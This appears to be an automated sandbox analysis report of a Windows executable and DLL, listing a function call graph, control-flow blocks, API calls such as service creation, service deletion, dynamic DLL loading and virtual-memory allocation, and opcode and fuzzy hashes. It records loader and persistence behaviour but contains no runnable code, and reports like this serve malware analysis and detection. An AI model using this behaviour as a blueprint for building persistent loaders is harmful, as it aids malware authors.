14168 140009de5 FreeEnvironmentStringsA 14166->14168 14170 140009d90 MultiByteToWideChar 14166->14170 14167->14171 14168->14171 14169->14171 14170->14166 14172 140009e0e 14170->14172 14175 1400099c0 GetModuleFileNameW 14171->14175 14173 140008de0 _lock 2 API calls 14172->14173 14174 140009e16 FreeEnvironmentStringsA 14173->14174 14174->14171 14176 140009a03 14175->14176 14177 140008300 _lock 17 API calls 14176->14177 14178 140009bca 14176->14178 14177->14178 14178->14072 14180 1400096b2 14179->14180 14181 1400096a8 14179->14181 14182 140008370 3 API calls 14180->14182 14181->14076 14190 1400096fa 14182->14190 14183 140009709 14183->14076 14184 1400097a5 14185 140008de0 _lock 2 API calls 14184->14185 14186 1400097b4 14185->14186 14186->14076 14187 140008370 3 API calls 14187->14190 14188 1400097e5 14189 140008de0 _lock 2 API calls 14188->14189 14189->14186 14190->14183 14190->14184 14190->14187 14190->14188 14193 140008666 14191->14193 14194 1400086bf 14193->14194 14279 140005380 14193->14279 14194->14080 14196 140001565 14195->14196 14197 140001569 14196->14197 14198 14000157e 14196->14198 14317 140001430 GetModuleFileNameW OpenSCManagerW 14197->14317 14201 140001595 OpenSCManagerW 14198->14201 14202 14000164f 14198->14202 14203 1400015b2 GetLastError 14201->14203 14204 1400015cf OpenServiceW 14201->14204 14205 140001654 14202->14205 14206 140001669 StartServiceCtrlDispatcherW 14202->14206 14203->14084 14207 140001611 DeleteService 14204->14207 14208 1400015e9 GetLastError CloseServiceHandle 14204->14208 14326 1400011f0 14205->14326 14206->14084 14210 140001626 CloseServiceHandle CloseServiceHandle 14207->14210 14211 14000161e GetLastError 14207->14211 14208->14084 14210->14084 14211->14210 14214 14000f01e _lock 14213->14214 14215 14000f03b LoadLibraryA 14214->14215 14216 14000f125 _lock 14214->14216 14217 14000f054 GetProcAddress 14215->14217 14218 1400094c9 14215->14218 14228 14000f165 14216->14228 14236 1400073e0 LdrLoadDll 14216->14236 14217->14218 14219 14000f06d _lock 14217->14219 14218->14044 14223 14000f075 GetProcAddress 14219->14223 14221 1400073e0 _lock LdrLoadDll 14221->14218 14222 1400073e0 _lock LdrLoadDll 14229 14000f1e9 14222->14229 14225 140007220 _lock 14223->14225 14227 14000f094 GetProcAddress 14225->14227 14226 1400073e0 _lock LdrLoadDll 14226->14228 14231 14000f0b3 _lock 14227->14231 14228->14222 14232 14000f1a3 _lock 14228->14232 14230 1400073e0 _lock LdrLoadDll 14229->14230 14229->14232 14230->14232 14231->14216 14233 14000f0e9 GetProcAddress 14231->14233 14232->14221 14234 14000f101 _lock 14233->14234 14234->14216 14235 14000f10d GetProcAddress 14234->14235 14235->14216 14237 140007333 14236->14237 14237->14236 14238 140007403 14237->14238 14238->14226 14240 1400083a0 14239->14240 14242 1400083e0 14240->14242 14243 1400083be Sleep 14240->14243 14250 14000e850 14240->14250 14242->14118 14243->14240 14243->14242 14245 1400073e0 _lock LdrLoadDll 14244->14245 14246 14000edec _lock 14245->14246 14247 14000ee26 GetModuleHandleA 14246->14247 14248 14000ee1d _lock 14246->14248 14247->14248 14249 14000ee38 GetProcAddress 14247->14249 14248->14119 14249->14248 14251 14000e865 14250->14251 14252 14000e8be HeapAlloc 14251->14252 14254 14000e876 sprintf_s 14251->14254 14255 1400090b0 14251->14255 14252->14251 14252->14254 14254->14240 14256 1400073e0 _lock LdrLoadDll 14255->14256 14257 1400090c5 14256->14257 14257->14251 14259 140008de9 HeapFree 14258->14259 14260 140008e19 _lock 14258->14260 14259->14260 14261 140008dff sprintf_s 14259->14261 14260->14144 14262 140008e09 GetLastError 14261->14262 14262->14260 14264 140008320 14263->14264 14266 140008358 14264->14266 14267 140008338 Sleep 14264->14267 14268 1400090f0 14264->14268 14266->14164 14266->14165 14267->14264 14267->14266 14269 14000919e 14268->14269 14276 140009103 14268->14276 14270 1400090b0 _lock LdrLoadDll 14269->14270 14273 1400091a3 sprintf_s 14270->14273 14271 14000914c HeapAlloc 14271->14276 14277 140009173 sprintf_s 14271->14277 14272 140009540 _lock 12 API calls 14272->14276 14273->14264 14274 140009300 _lock 10 API calls 14274->14276 14275 1400090b0 _lock LdrLoadDll 14275->14276 14276->14271 14276->14272 14276->14274 14276->14275 14276->14277 14278 140008510 _lock 3 API calls 14276->14278 14277->14264 14278->14276 14282 140005250 14279->14282 14281 140005389 14281->14194 14283 140005271 14282->14283 14284 1400073e0 _lock LdrLoadDll 14283->14284 14285 14000527e 14284->14285 14286 1400073e0 _lock LdrLoadDll 14285->14286 14287 14000528d 14286->14287 14292 1400052f0 _lock 14287->14292 14294 140008490 14287->14294 14289 1400052b5 14290 1400052d9 14289->14290 14289->14292 14297 140008400 14289->14297 14290->14292 14293 140008400 7 API calls 14290->14293 14292->14281 14293->14292 14295 1400084c5 HeapSize 14294->14295 14296 140008499 sprintf_s 14294->14296 14296->14289 14299 140008430 14297->14299 14300 140008450 Sleep 14299->14300 14301 140008472 14299->14301 14302 14000e920 14299->14302 14300->14299 14300->14301 14301->14290 14303 14000e935 14302->14303 14304 14000e94c 14303->14304 14313 14000e95e 14303->14313 14305 140008de0 _lock 2 API calls 14304->14305 14308 14000e951 14305->14308 14306 14000e9b1 14307 1400090b0 _lock LdrLoadDll 14306->14307 14316 14000e9b9 _lock sprintf_s 14307->14316 14308->14299 14309 14000e973 HeapReAlloc 14309->14313 14309->14316 14310 14000e9f4 sprintf_s 14312 14000e9f9 GetLastError 14310->14312 14311 1400090b0 _lock LdrLoadDll 14311->14313 14312->14316 14313->14306 14313->14309 14313->14310 14313->14311 14314 14000e9db sprintf_s 14313->14314 14315 14000e9e0 GetLastError 14314->14315 14315->14316 14316->14299 14318 140001482 CreateServiceW 14317->14318 14319 14000147a GetLastError 14317->14319 14321 1400014ea GetLastError 14318->14321 14322 1400014df CloseServiceHandle 14318->14322 14320 1400014fd 14319->14320 14332 140004f30 14320->14332 14323 1400014f2 CloseServiceHandle 14321->14323 14322->14323 14323->14320 14325 14000150d 14325->14084 14327 1400011fa 14326->14327 14341 1400051d0 14327->14341 14330 140004f30 sprintf_s NtAllocateVirtualMemory 14331 140001262 14330->14331 14331->14084 14334 140004f39 __CxxFrameHandler 14332->14334 14333 140004f44 14333->14325 14334->14333 14337 140006c95 14334->14337 14336 14000660e sprintf_s 14336->14325 14338 140006d9d 14337->14338 14340 140006d7b 14337->14340 14338->14336 14339 140006f95 NtAllocateVirtualMemory 14339->14338 14340->14338 14340->14339 14344 140008270 14341->14344 14343 140001238 MessageBoxW 14343->14330 14345 14000827e 14344->14345 14346 1400082ac sprintf_s 14344->14346 14345->14346 14348 140008120 14345->14348 14346->14343 14349 14000813b sprintf_s 14348->14349 14350 14000816a 14348->14350 14349->14346 14350->14349 14352 1400081d7 14350->14352 14354 140007f50 14350->14354 14352->14349 14353 140007f50 sprintf_s 54 API calls 14352->14353 14353->14349 14364 140007f69 sprintf_s 14354->14364 14355 140007f74 sprintf_s 14355->14352 14356 14000801d 14357 1400080d5 14356->14357 14358 14000802f 14356->14358 14359 14000cc00 sprintf_s 54 API calls 14357->14359 14360 14000804c 14358->14360 14363 140008081 14358->14363 14361 140008056 14359->14361 14370 14000cc00 14360->14370 14361->14352 14363->14361 14378 14000c2a0 14363->14378 14364->14355 14364->14356 14367 14000cd50 14364->14367 14368 140008300 _lock 17 API calls 14367->14368 14369 14000cd6a 14368->14369 14369->14356 14371 14000cc3f 14370->14371 14377 14000cc23 sprintf_s 14370->14377 14371->14377 14386 14000fc50 14371->14386 14375 14000ccc5 sprintf_s 14431 14000fd20 LeaveCriticalSection 14375->14431 14377->14361 14379 14000c2e0 14378->14379 14381 14000c2c3 sprintf_s 14378->14381 14380 14000fc50 sprintf_s 25 API calls 14379->14380 14379->14381 14382 14000c34e 14380->14382 14381->14361 14383 14000c1f0 sprintf_s 2 API calls 14382->14383 14384 14000c367 sprintf_s 14382->14384 14383->14384 14465 14000fd20 LeaveCriticalSection 14384->14465 14387 14000fc96 14386->14387 14388 14000fccb 14386->14388 14432 14000b400 14387->14432 14390 14000ccac 14388->14390 14391 14000fccf EnterCriticalSection 14388->14391 14390->14375 14396 14000c3f0 14390->14396 14391->14390 14399 14000c42e 14396->14399 14415 14000c427 sprintf_s 14396->14415 14397 140004f30 sprintf_s NtAllocateVirtualMemory 14398 14000cbe6 14397->14398 14398->14375 14402 14000c4fb __CxxFrameHandler sprintf_s 14399->14402 14399->14415 14459 14000c1f0 14399->14459 14401 14000c841 14403 14000c86a 14401->14403 14404 14000cb20 WriteFile 14401->14404 14402->14401 14405 14000c526 GetConsoleMode 14402->14405 14407 14000c936 14403->14407 14411 14000c876 14403->14411 14406 14000cb53 GetLastError 14404->14406 14404->14415 14405->14401 14408 14000c557 14405->14408 14406->14415 14413 14000c940 14407->14413 14421 14000ca02 14407->14421 14408->14401 14409 14000c564 GetConsoleCP 14408->14409 14409->14415 14425 14000c581 sprintf_s 14409->14425 14410 14000c8c5 WriteFile 14410->14411 14412 14000c928 GetLastError 14410->14412 14411->14410 14411->14415 14412->14415 14413->14415 14416 14000c991 WriteFile 14413->14416 14414 14000ca57 WideCharToMultiByte 14418 14000cb15 GetLastError 14414->14418 14414->14421 14415->14397 14416->14413 14417 14000c9f4 GetLastError 14416->14417 14417->14415 14418->14415 14419 14000cab0 WriteFile 14420 14000caf6 GetLastError 14419->14420 14419->14421 14420->14415 14420->14421 14421->14414 14421->14415 14421->14419 14422 14000fd50 7 API calls sprintf_s 14422->14425 14423 14000c649 WideCharToMultiByte 14423->14415 14424 14000c68c WriteFile 14423->14424 14424->14425 14426 14000c80d GetLastError 14424->14426 14425->14415 14425->14422 14425->14423 14427 14000c829 GetLastError 14425->14427 14428 14000c6e2 WriteFile 14425->14428 14430 14000c81b GetLastError 14425->14430 14426->14415 14427->14415 14428->14425 14429 14000c7ff GetLastError 14428->14429 14429->14415 14430->14415 14433 14000b41e 14432->14433 14434 14000b42f EnterCriticalSection 14432->14434 14438 14000b2f0 14433->14438 14436 14000b423 14436->14434 14437 1400084e0 _lock 12 API calls 14436->14437 14437->14434 14439 14000b317 14438->14439 14440 14000b32e 14438->14440 14441 140009540 _lock 12 API calls 14439->14441 14442 140008300 _lock 17 API calls 14440->14442 14446 14000b342 sprintf_s 14440->14446 14443 14000b31c 14441->14443 14444 14000b350 14442->14444 14445 140009300 _lock 10 API calls 14443->14445 14444->14446 14449 14000b400 _lock 22 API calls 14444->14449 14447 14000b324 14445->14447 14446->14436 14448 140008510 _lock GetModuleHandleA GetProcAddress ExitProcess 14447->14448 14448->14440 14450 14000b371 14449->14450 14451 14000b3a7 14450->14451 14452 14000b379 14450->14452 14453 140008de0 _lock HeapFree GetLastError 14451->14453 14454 14000edc0 _lock LdrLoadDll GetModuleHandleA GetProcAddress 14452->14454 14458 14000b392 sprintf_s 14453->14458 14455 14000b386 14454->14455 14457 140008de0 _lock HeapFree GetLastError 14455->14457 14455->14458 14456 14000b3b0 LeaveCriticalSection 14456->14446 14457->14458 14458->14456 14460 14000c20c sprintf_s 14459->14460 14461 14000c212 sprintf_s 14460->14461 14462 14000c22c SetFilePointer 14460->14462 14461->14402 14463 14000c254 sprintf_s 14462->14463 14464 14000c24a GetLastError 14462->14464 14463->14402 14464->14463 14031 140006c95 14032 140006d9d 14031->14032 14034 140006d7b 14031->14034 14033 140006f95 NtAllocateVirtualMemory 14033->14032 14034->14032 14034->14033 14466 1400054e0 14467 140005506 sprintf_s 14466->14467 14468 14000552c 14466->14468 14479 1400074d0 14468->14479 14471 140008370 3 API calls 14474 140005545 __CxxFrameHandler 14471->14474 14472 1400055b8 14473 140008de0 _lock 2 API calls 14472->14473 14475 1400055c0 sprintf_s 14473->14475 14474->14472 14483 1400074f0 14474->14483 14475->14467 14478 1400055b0 GetLastError 14478->14472 14481 140007333 14479->14481 14480 140005536 14480->14471 14481->14480 14482 1400073e0 LdrLoadDll 14481->14482 14482->14481 14485 140007333 14483->14485 14484 140005561 CreateThread 14484->14475 14484->14478 14485->14484 14486 1400073e0 LdrLoadDll 14485->14486 14486->14485

                                                                                  Executed Functions

                                                                                  Function 0000000140006C95 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 260COMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 131 140006c95-140006d75 132 1400075a3-1400075af 131->132 133 140006d7b-140006d9b 131->133 134 140006da2-140006dbc 133->134 135 140006d9d 133->135 136 140006dc3-140006ded 134->136 137 140006dbe 134->137 135->132 138 140006df4-140006e04 136->138 139 140006def 136->139 137->132 140 140006e06 138->140 141 140006e0b-140006e19 138->141 139->132 140->132 142 140006e1b 141->142 143 140006e20-140006e2f 141->143 142->132 144 140006e31 143->144 145 140006e36-140006e4e 143->145 144->132 146 140006e5a-140006e67 145->146 147 140006e69-140006e94 146->147 148 140006e9d-140006ed0 146->148 149 140006e96 147->149 150 140006e9b 147->150 151 140006edc-140006ee9 148->151 149->132 150->146 152 140006f89-140006f8e 151->152 153 140006eef-140006f23 151->153 157 140006f95-140006fd6 NtAllocateVirtualMemory 152->157 158 140006f90 152->158 155 140006f25-140006f2d 153->155 156 140006f2f-140006f33 153->156 159 140006f37-140006f7a 155->159 156->159 157->132 160 140006fdc-140007020 157->160 158->132 161 140006f84 159->161 162 140006f7c-140006f80 159->162 163 14000702c-140007037 160->163 161->151 162->161 165 140007039-140007058 163->165 166 14000705a-140007062 163->166 165->163 168 14000706e-14000707b 166->168 169 140007081-140007094 168->169 170 140007148-14000715e 168->170 171 140007096-1400070a9 169->171 172 1400070ab 169->172 173 1400072e2-1400072eb 170->173 174 140007164-14000717a 170->174 171->172 175 1400070ad-1400070db 171->175 176 140007064-14000706a 172->176 174->173 177 1400070ea-140007101 175->177 176->168 178 140007143 177->178 179 140007103-140007141 177->179 178->176 179->177
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: @$@
                                                                                  • API String ID: 0-149943524
                                                                                  • Opcode ID: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                  • Instruction ID: b9b90cad4d4dbad5e60228b5b2812afcd9ff4e9267d7912497f5da913a33a31e
                                                                                  • Opcode Fuzzy Hash: 7cfc64899170ff4cc517d5e5588f068c1185db4b9779a261fbf36bfcd151d312
                                                                                  • Instruction Fuzzy Hash: 0EE19876619B84CADBA1CB19E4807AAB7A1F3C8795F105116FB8E87B68DB7CC454CF00
                                                                                  Function 00000001400073E0 Relevance: 1.6, APIs: 1, Instructions: 121libraryloaderCOMMONLIBRARYCODE
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 256 1400073e0-1400073e9 LdrLoadDll 257 1400073f8-140007401 256->257 258 140007403 257->258 259 140007408-14000742e 257->259 260 1400075a3-1400075af 258->260 262 140007435-140007462 259->262 263 140007430 259->263 265 140007464-14000747e 262->265 266 1400074b6-1400074e9 262->266 264 140007559-140007567 263->264 272 140007341-1400073de 264->272 273 14000756c-1400075a2 264->273 268 1400074b4 265->268 269 140007480-1400074b3 265->269 270 1400074eb-14000752b 266->270 271 14000752c-140007535 266->271 268->271 269->268 270->271 274 140007552 271->274 275 140007537-140007554 271->275 272->256 273->260 274->260 275->264
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Load
                                                                                  • String ID:
                                                                                  • API String ID: 2234796835-0
                                                                                  • Opcode ID: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                  • Instruction ID: 9a2124daaedac402c784edcfb7064d0c1467828d98a6eaf5875e1b487be58861
                                                                                  • Opcode Fuzzy Hash: 2ac1721fb543b4f5636bdbbd43774787bb16f59a86ab6105cb05102c09e3eb47
                                                                                  • Instruction Fuzzy Hash: 2451A676619BC582DA71CB1AE4907EEA360F7C8B85F504026EB8E87B69DF3DC455CB00
                                                                                  Function 0000000140005DF3 Relevance: 54.3, APIs: 3, Strings: 28, Instructions: 79fileCOMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359077787.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359063412.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359136200.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359152941.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359208093.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_140000000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CreateReadmalloc
                                                                                  • String ID: .$.$L$M$M$a$a$c$c$d$d$i$l$l$l$l$m$m$o$p$r$s$s$s$t$t$t$v
                                                                                  • API String ID: 3950102678-3381721293
                                                                                  • Opcode ID: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                  • Instruction ID: 29f707ba186f29322d2427d6251999ac740dd2877dad0e4ee3b4d54c0b8fffc7
                                                                                  • Opcode Fuzzy Hash: 3049977341a31d9fc1ffd9be0b7c42ac82c2b568782cbed11d6bb6d6295d5fdb
                                                                                  • Instruction Fuzzy Hash: 0241A03250C7C0C9E372C729E45879BBB91E3A6748F04405997C846B9ACBBED158CB22
                                                                                  Function 00007FF8BFB81C00 Relevance: 12.2, APIs: 8, Instructions: 227COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 25 7ff8bfb81c00-7ff8bfb81c06 26 7ff8bfb81c08-7ff8bfb81c0b 25->26 27 7ff8bfb81c41-7ff8bfb81c4b 25->27 28 7ff8bfb81c0d-7ff8bfb81c10 26->28 29 7ff8bfb81c35-7ff8bfb81c74 call 7ff8bfb82470 26->29 30 7ff8bfb81d68-7ff8bfb81d7d 27->30 31 7ff8bfb81c28 __scrt_dllmain_crt_thread_attach 28->31 32 7ff8bfb81c12-7ff8bfb81c15 28->32 48 7ff8bfb81c7a-7ff8bfb81c8f call 7ff8bfb82304 29->48 49 7ff8bfb81d42 29->49 33 7ff8bfb81d7f 30->33 34 7ff8bfb81d8c-7ff8bfb81da6 call 7ff8bfb82304 30->34 40 7ff8bfb81c2d-7ff8bfb81c34 31->40 36 7ff8bfb81c17-7ff8bfb81c20 32->36 37 7ff8bfb81c21-7ff8bfb81c26 call 7ff8bfb823b4 32->37 38 7ff8bfb81d81-7ff8bfb81d8b 33->38 46 7ff8bfb81ddb-7ff8bfb81e0c call 7ff8bfb82630 34->46 47 7ff8bfb81da8-7ff8bfb81dd9 call 7ff8bfb8242c call 7ff8bfb822d4 call 7ff8bfb827b4 call 7ff8bfb825d0 call 7ff8bfb825f4 call 7ff8bfb8245c 34->47 37->40 59 7ff8bfb81e0e-7ff8bfb81e14 46->59 60 7ff8bfb81e1d-7ff8bfb81e23 46->60 47->38 57 7ff8bfb81d5a-7ff8bfb81d67 call 7ff8bfb82630 48->57 58 7ff8bfb81c95-7ff8bfb81ca6 call 7ff8bfb82374 48->58 52 7ff8bfb81d44-7ff8bfb81d59 49->52 57->30 75 7ff8bfb81ca8-7ff8bfb81ccc call 7ff8bfb82778 call 7ff8bfb822c4 call 7ff8bfb822e8 call 7ff8bfb87b10 58->75 76 7ff8bfb81cf7-7ff8bfb81d01 call 7ff8bfb825d0 58->76 59->60 64 7ff8bfb81e16-7ff8bfb81e18 59->64 65 7ff8bfb81e65-7ff8bfb81e6d call 7ff8bfb81720 60->65 66 7ff8bfb81e25-7ff8bfb81e2f 60->66 71 7ff8bfb81f02-7ff8bfb81f0f 64->71 77 7ff8bfb81e72-7ff8bfb81e7b 65->77 72 7ff8bfb81e36-7ff8bfb81e3c 66->72 73 7ff8bfb81e31-7ff8bfb81e34 66->73 78 7ff8bfb81e3e-7ff8bfb81e44 72->78 73->78 75->76 127 7ff8bfb81cce-7ff8bfb81cd5 __scrt_dllmain_after_initialize_c 75->127 76->49 99 7ff8bfb81d03-7ff8bfb81d0f call 7ff8bfb82620 76->99 84 7ff8bfb81e7d-7ff8bfb81e7f 77->84 85 7ff8bfb81eb3-7ff8bfb81eb5 77->85 80 7ff8bfb81e4a-7ff8bfb81e5f call 7ff8bfb81c00 78->80 81 7ff8bfb81ef8-7ff8bfb81f00 78->81 80->65 80->81 81->71 84->85 94 7ff8bfb81e81-7ff8bfb81ea3 call 7ff8bfb81720 call 7ff8bfb81d68 84->94 88 7ff8bfb81ebc-7ff8bfb81ed1 call 7ff8bfb81c00 85->88 89 7ff8bfb81eb7-7ff8bfb81eba 85->89 88->81 108 7ff8bfb81ed3-7ff8bfb81edd 88->108 89->81 89->88 94->85 122 7ff8bfb81ea5-7ff8bfb81eaa 94->122 115 7ff8bfb81d35-7ff8bfb81d40 99->115 116 7ff8bfb81d11-7ff8bfb81d1b call 7ff8bfb82538 99->116 113 7ff8bfb81edf-7ff8bfb81ee2 108->113 114 7ff8bfb81ee4-7ff8bfb81ef2 108->114 119 7ff8bfb81ef4 113->119 114->119 115->52 116->115 126 7ff8bfb81d1d-7ff8bfb81d2b 116->126 119->81 122->85 126->115 127->76 128 7ff8bfb81cd7-7ff8bfb81cf4 call 7ff8bfb87acc 127->128 128->76
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                  • String ID:
                                                                                  • API String ID: 190073905-0
                                                                                  • Opcode ID: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                  • Instruction ID: 0648c239636ee1c9e460946bdfad03c115650ca6fcfe4a3d65d71072c2eaabab
                                                                                  • Opcode Fuzzy Hash: 2846997451869cfc22dce892cf33863956c031717884ec40ded3d85d199baf95
                                                                                  • Instruction Fuzzy Hash: F2819A21E0E2438AFA54ABEEA4512B93390AFC57C0F548435EB4D47B93DE3CE846C710
                                                                                  Function 00007FF8BFB81720 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
                                                                                  • API ID: Concurrency::cancel_current_taskFree$ConsoleFileFindFirstLibrary
                                                                                  • String ID: WordpadFilter.db
                                                                                  • API String ID: 868324331-3647581008
                                                                                  • Opcode ID: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                  • Instruction ID: d7634e7b79b2ae836a4baee94a7678c3f4c36b234ca533b537e8465881d3c143
                                                                                  • Opcode Fuzzy Hash: d3782359f8138357475ac289ad5b0888311af99f11814fa5341d046d98142f4f
                                                                                  • Instruction Fuzzy Hash: BC315A32B1AB81C9E740CFA5D8502AD73A5EB89788F148635EF8C53B45EF38D5A2C340
                                                                                  Function 00007FF8BFB811B0 Relevance: 3.2, APIs: 2, Instructions: 235COMMON
                                                                                  Download Yara Rule

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 196 7ff8bfb811b0-7ff8bfb81207 197 7ff8bfb8124b-7ff8bfb8124e 196->197 198 7ff8bfb81209-7ff8bfb81222 call 7ff8bfb91490 196->198 199 7ff8bfb814b8-7ff8bfb814bf 197->199 200 7ff8bfb81254-7ff8bfb81280 197->200 210 7ff8bfb8123e 198->210 211 7ff8bfb81224-7ff8bfb81227 198->211 204 7ff8bfb814c3-7ff8bfb814ea call 7ff8bfb81b70 199->204 202 7ff8bfb812f6-7ff8bfb81335 call 7ff8bfb81b90 call 7ff8bfb90a50 200->202 203 7ff8bfb81282-7ff8bfb8128f 200->203 232 7ff8bfb81340-7ff8bfb813cb 202->232 207 7ff8bfb81295-7ff8bfb8129c 203->207 208 7ff8bfb814f1-7ff8bfb814f6 call 7ff8bfb81a40 203->208 216 7ff8bfb8129e-7ff8bfb812a5 207->216 217 7ff8bfb812c7-7ff8bfb812cf call 7ff8bfb81b90 207->217 223 7ff8bfb814f7-7ff8bfb814ff call 7ff8bfb81110 208->223 213 7ff8bfb81241-7ff8bfb81246 210->213 212 7ff8bfb81229-7ff8bfb8123c call 7ff8bfb91490 211->212 211->213 212->210 212->211 213->197 222 7ff8bfb812ab-7ff8bfb812b3 call 7ff8bfb81b90 216->222 216->223 230 7ff8bfb812d2-7ff8bfb812f1 call 7ff8bfb90e10 217->230 236 7ff8bfb814eb-7ff8bfb814f0 call 7ff8bfb879cc 222->236 237 7ff8bfb812b9-7ff8bfb812c5 222->237 230->202 232->232 235 7ff8bfb813d1-7ff8bfb813da 232->235 239 7ff8bfb813e0-7ff8bfb81402 235->239 236->208 237->230 242 7ff8bfb81404-7ff8bfb8140e 239->242 243 7ff8bfb81411-7ff8bfb8142c 239->243 242->243 243->239 244 7ff8bfb8142e-7ff8bfb81436 243->244 245 7ff8bfb81498-7ff8bfb814a6 244->245 246 7ff8bfb81438-7ff8bfb8143b 244->246 248 7ff8bfb814a8-7ff8bfb814b5 call 7ff8bfb81bcc 245->248 249 7ff8bfb814b6 245->249 247 7ff8bfb81440-7ff8bfb81449 246->247 250 7ff8bfb8144b-7ff8bfb81453 247->250 251 7ff8bfb81455-7ff8bfb81465 247->251 248->249 249->204 250->251 253 7ff8bfb81467-7ff8bfb8146e 251->253 254 7ff8bfb81470-7ff8bfb81496 251->254 253->254 254->245 254->247
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000003.00000002.2359237188.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                  • Associated: 00000003.00000002.2359223150.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359280231.00007FF8BFB92000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359295333.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                  • Associated: 00000003.00000002.2359308946.00007FF8BFB9F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_3_2_7ff8bfb80000_9afrYB.jbxd
                                                                                  Similarity
